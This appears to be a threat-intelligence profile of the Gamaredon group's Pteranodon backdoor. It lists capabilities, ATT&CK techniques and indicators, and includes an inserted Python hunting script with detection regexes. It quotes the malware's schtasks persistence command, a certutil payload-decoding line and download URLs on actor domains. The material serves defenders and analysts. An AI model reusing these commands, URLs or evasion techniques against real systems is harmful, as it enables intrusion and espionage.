Pteranodon
Pteranodon, also tracked as Pterodo, is a custom backdoor and deployment framework used by the Russia-linked Gamaredon threat group (also known as Armageddon/UAC-0010), which Ukrainian authorities have tied to the FSB. By 2016, Gamaredon had shifted from off-the-shelf tooling such as Remote Manipulator System RAT to this custom framework, and later evolved further into a fragmented, modular malware ecosystem. Pteranodon/Pterodo has been used in campaigns targeting Ukrainian state authorities and other Ukrainian government, military, law-enforcement, national security, and critical infrastructure entities.
Documented capabilities include loading additional payloads, executing arbitrary commands, collecting system information, stealing files from local systems and USB drives, capturing screenshots at configurable intervals, and exfiltrating screenshot files and other collected data to command-and-control servers. Reported behavior includes creating subdirectories under %Temp%\reports%, storing screenshot JPEGs under C:\Users\<user>\AppData\Roaming\Microsoft\store, scheduling tasks to invoke components for persistence, using malicious VBS files for execution, and using mshta.exe to execute remotely hosted HTA files. It can delete files that interfere with execution, remove temporary files, and self-delete after the initial script runs. The malware also includes anti-detection functionality to identify sandbox environments.
CERT-UA and the Foreign Intelligence Service of Ukraine reported new Pterodo-type modifications on computers of Ukrainian state authorities, describing them as collecting system data, regularly sending it to C2 servers, and awaiting further commands, likely as preparation for cyber attacks. The malware has also been referenced in relation to CrowdStrike’s SpiceyHoney campaign attribution and in reporting on Gamaredon operations against Ukrainian victims. High-confidence indicators and artifacts mentioned in the content include the %Temp%\reports% staging path, the screenshot storage path under AppData\Roaming\Microsoft\store, use of scheduled tasks for persistence, and execution via VBS and remote HTA files through mshta.exe.
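The artifacts listed above (remote HTA execution through mshta.exe, a short-interval schtasks /SC MINUTE task, screenshot JPEGs under AppData\Roaming\Microsoft\store, and the %Temp%\reports staging directory) can be turned into hunting logic. The following is an added example, not code from the page or from Mallory; it runs over constructed Sysmon-style events (event id 1 = process creation, id 11 = file creation), and the 15-minute interval threshold is an assumption chosen to catch the 12-minute cadence reported for this family.

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample telemetry in a Sysmon-like shape; not real logs.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr C:\\Temp\\x.vbs"},
    {"id": 11, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\store\20240101_120000.jpg"},
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\local.hta"},      # local HTA: not flagged
    {"id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks /Create /SC DAILY /tn Backup /tr backup.exe"},  # daily cadence: not flagged
]

# mshta.exe launched with a remote http(s) URL as its argument
MSHTA_REMOTE = re.compile(r"mshta(\.exe)?\s+.*https?://", re.I)
# schtasks /Create with a MINUTE schedule; captures the /MO interval if present
SCHTASKS_MIN = re.compile(r"/Create\b.*?/SC\s+MINUTE\b(?:.*?/MO\s+(\d+))?", re.I)
# screenshot JPEGs written to the reported store directory
STORE_DIR = re.compile(r"\\AppData\\Roaming\\Microsoft\\store\\[^\\]+\.jpe?g$", re.I)
# files created under the %Temp%\reports staging path
TEMP_REPORTS = re.compile(r"\\Temp\\reports\b", re.I)

MAX_MINUTES = 15  # assumed threshold; page reports a 12-minute task interval


def classify(event: Dict) -> Optional[str]:
    """Return a rule name when the event matches a Pteranodon-style artifact, else None."""
    if event["id"] == 1:
        cmd = event.get("cmdline", "")
        if MSHTA_REMOTE.search(cmd):
            return "mshta_remote_hta"
        m = SCHTASKS_MIN.search(cmd)
        # schtasks defaults /MO to 1 when omitted, so a missing modifier is also short-interval
        if m and (m.group(1) is None or int(m.group(1)) <= MAX_MINUTES):
            return "schtasks_short_minute_interval"
    elif event["id"] == 11:
        target = event.get("target", "")
        if STORE_DIR.search(target):
            return "screenshot_store_path"
        if TEMP_REPORTS.search(target):
            return "temp_reports_staging"
    return None


def hunt(events: Iterable[Dict]) -> List[Tuple[str, str]]:
    """Pair each matching rule with the command line or file path that triggered it."""
    return [(r, e.get("cmdline") or e.get("target")) for e in events if (r := classify(e))]
```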
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Documents ... contained malicious code to exploit the known Microsoft Office vulnerability CVE-2017-0199 ... which allows an attacker to execute arbitrary code on the user's device when the infected file is opened.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group was tied to the FSB by Ukraine’s Security Service, it originally used off-the-shelf tools like Remote Manipulator System RAT, then moved to a custom framework called Pteranodon, and gradually fragmented into a constellation of standalone, modular malware families.
Indicators of Compromise (IoCs): ... Malware: Pterodo backdoor associated with UAC-0010 (Gamaredon)
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Historically, according to the 2015 LookingGlass report Operation Armageddon: Cyber Espionage as a Strategic Component of Russian Modern Warfare, Gamaredon conducted spearphishing campaigns using stolen, highly relevant decoy documents mimicking Ukrainian institutions to target government entities.
Execution
7 techniques
The malware executable sets itself up as a task with “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Attack Pattern Command-Line Interface - T1059
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
"The macro contains VBScript..."; "...files with the .exe and .vbs extensions are created..."; "...vcqkmwhafaky.exe – ... contains VBScript."
The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.
Persistence
3 techniques
The malware executable sets itself up as a task with “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
3 techniques
The malware executable sets itself up as a task with “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Stealth
7 techniques
"...compilation of UserSupport.cs with csc.exe (the C# compiler)... into UserSupport.exe"
One of the notable features of the malware's Interop component is its use of a fake Microsoft digital certificate purporting to belong to the Microsoft Time-Stamp Service.
Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
Multiple actors and malware families are described as using mshta/mshta.exe (including renamed mshta.exe) to execute malicious scripts/HTA/HTML/VBScript/JavaScript, download and run payloads from remote servers, and in one case help schedule tasks for persistence.
Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.
Discovery
3 techniques
"...provides ... information about the device name, the drive name and its serial number"
“3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory… admin@338 actors used… dir c:\ >> %temp%\download … APT28 has used Forfiles to locate PDF, Excel, and Word documents…”
Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.
Collection
4 techniques
This malware collects system data, regularly sends it to command-and-control servers and awaits further commands.
The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.
"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"
Command and Control
4 techniques
Tool: Telegram, used as a C2 channel by UAC-0010 and others. Tool: Telegraph, used for IP-based C2 routing by UAC-0010.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
"...files with the .dot extension are downloaded automatically..."; "...downloads scaffold.exe from http://tridiuma.ru/scaffold.php"; "...obtain code from ... http://barbatus.online/get.php"
Malware: Remcos RAT, a remote access trojan used for persistent access ... Malware: NetSupport RAT, a legitimate RMM tool abused as malware.
Exfiltration
2 techniques
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
40 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Custom malware framework previously used by Gamaredon before its tooling evolved into more fragmented modular malware families.
A custom-built framework previously used by Gamaredon before its tooling evolved into more fragmented and modular malware variants.
A historical custom backdoor and deployment framework used by Gamaredon. It loaded additional payloads, executed arbitrary commands, captured screenshots, and stole files from local systems and USB drives for exfiltration.
Backdoor associated with UAC-0010 (Gamaredon).